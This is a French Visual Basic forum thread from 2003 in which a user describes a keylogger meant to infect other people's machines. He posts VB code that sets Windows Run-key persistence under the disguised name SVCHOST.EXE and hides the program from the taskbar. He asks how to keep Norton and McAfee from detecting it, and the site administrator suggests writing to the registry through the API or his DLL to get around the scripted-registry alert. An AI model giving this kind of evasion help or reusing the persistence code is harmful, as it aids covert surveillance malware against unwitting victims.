Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum. Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

Sujet : HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS! [ Archives Visual Basic / J'AI BESOIN D'AIDE !!!! :) ] (paprikarmasutra)

lundi 6 octobre 2003 à 02:01:25 | HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

paprikarmasutra

Salut,

J'ai créé un prog (keylogger) qui a la capacité de voir si une clé lui est attribuée dans REGEDIT afin qu'il se lance automatiquement à chaque démarrage de Windows. S'il n'y en a pas, il en crée une.

Le problème, c'est que Norton, McAfee et compagnie détectent un script "malicieux" dans mon prog, et demandent s'il faut exécuter ce script ou non. Du coup, si ça fait ça chez la personne infectée, ça risque de poser quelques problèmes...

Auriez-vous une solution à mon problème pour contourner ces foutus (bons) AV?

Merci, @ bientôt. Et excusez-moi d'avance si la réponse se trouve quelquepart sur le site, mes recherches n'ont pas été fructueuses jusqu'à maintenant...

lundi 6 octobre 2003 à 08:25:59 | Re : HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

BruNews

Administrateur CodeS-SourceS
Indique comment tu ecris dans registres si tu veux qu'on trouve une solution.
BruNews, ciao...

lundi 6 octobre 2003 à 13:31:31 | Re : HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

paprikarmasutra

Voilà comment j'écris dans le registre :



Private Sub Form_Load()

Set Me.Icon = Nothing
App.TaskVisible = False

Dim WshShell As Variant

Set WshShell = CreateObject("Wscript.Shell")

On Error GoTo CREATEKEY

Text2.Text = WshShell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SVCHOST")

Exit Sub

CREATEKEY:

Set WshShell = CreateObject("Wscript.Shell")

WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SVCHOST", "C:\WINDOWS\SVCHOST.EXE"

End Sub


Je précise que SVCHOST.EXE est le nom de mon programme afin qu'il soit "camouflé" dans les services.

Voilà, j'espère que quelqu'un va pouvoir m'aider là! =)

Merci d'avance.

lundi 6 octobre 2003 à 13:44:25 | Re : HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

BruNews

Administrateur CodeS-SourceS
Alors normal car tu executes du script, il faut ecrire avec API.
Tu peux aussi te servir de ma dll qui est plus simple d'emploi, se trouve dans mes sources.
BruNews, ciao...

lundi 6 octobre 2003 à 14:02:38 | Re : HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

paprikarmasutra

J'ai vu ce que ça donnait avec ta dll, mais je trouve ça un peu complexe. Est-ce que tu peux me donner un exemple avec API? As-tu un exemple simple, juste pour l'écriture au moins?

Le truc, c'est que je voudrais éviter d'ajouter des dll au programme, parce que c'est quand même un truc qui est censé s'installer avec les composants existants sur la machine.

Voilà, merci pour ton aide en tout cas! =)

lundi 6 octobre 2003 à 14:10:55 | Re : HELP > REGEDIT & AV (Norton, McAfee, etc.) = GROS SOUCIS!

BruNews

Administrateur CodeS-SourceS
Desole mais je ne fais que C ou ASM (comme la dll). Note que la dll n'a pas a etre enregistree, te suffit de la poser dans dossier de ton exe.
BruNews, ciao...



Cette discussion est classé dans : help, regedit, norton, av, mcafee


Répondre à ce message

Sujets en rapport avec ce message

HELP !!!REGEDIT [ par TheHacker ] TheHacker Salut, j'avais vu une fois une source suyr VBfrance mias helas je ne la trouve + alors si son auteur ou qqun d'autre connait le link je suis HELP! Macro Excel et Requete SQL HELP ! [ par titosolteron ] Bonjour j'essaye actuellement de construire une macro VB sous excel pour rapatrier les donnees d'un AS400j'ai constuit un fichier .dqy avec la requete Help: VB+GENERATEUR SQL [ par abracadabra ] Salut tout le monde,J'ai un petit probleme dans le "Générateur de requête SQL" dans VB...Je n'arrive pas à lier ma requête à une variable DataCombo de PHP Help me ! :-) [ par MEGATRIX ] Salut; j'ai un ti pbl avec le php je me permet de poser cette question ici car je suis de base programmeur vb!Bon alors mon pbl c que je ne sais po co HELP! detection type de donnee dans une cellule HELP! [ par titosolteron ] bonjour,j'ai une colonne rempli avec des donnees diverses dans certaines cellules j'ai que 13 chiffres ces cellules la doivent etre copies meme ligne help c simple et urgent !!!! [ par Mrx3 ] je recherche comment définir le mois et le jour en vbscript par exemple pour afficher une boite de dialogue à une certaine date dans l'année (et sa qu help creation de control activeX [ par norvaal ] NBCa)Comment peut on modifier une propriété d'une form sur laquelle on ajout sont ocx que l'on vient de créer via cet ocxex: je voudrais lorsque je po Help!! autorisation d'un partager [ par yotaaa ] Bonjourje voudrai vous demander si quelqu'un sait comment gerer la securite d'un dossier partager??je veux dire par la autoriser des utilisateurs prec help fichier cls [ par jesusonline ] j'aimerais pouvoir utiliser la classe proposer dans cette page http://www.codeproject.com/useritems/TimerComputerShutdown.asp quand je dezippe le fich Méthode FaxServer.Connect Help me [ par labout ] laboutSous Windows 2000 et Vb6Voici mon codeJ'utilise les dll FAXCOM.DLL et MDOSYS.DLLDim FaxDocument As ObjectSet Faxserver = CreateObject("FaxServer


Nos sponsors

Sondage...

CalendriCode

Décembre 2008
LMMJVSD
1234567
891011121314
15161718192021
22232425262728
293031    

Consulter la suite du CalendriCode

Téléchargements

Logiciels à télécharger sur le même thème :



Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel BAÏSE, Merci à Vincent pour ses précieux conseils
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés
Temps d'éxécution de la page : 0,296 sec

Google Coop CodeS-SourceS Google Coop CodeS-SourceS


Certaines images présentes sur le site (notament certains avatars) sont issues des collections IconShock, donc si vous souhaitez utiliser ces icons vous devez les acheter, ne les copiez pas et ne utilisez pas dans vos sites et applications sans les avoir commandé.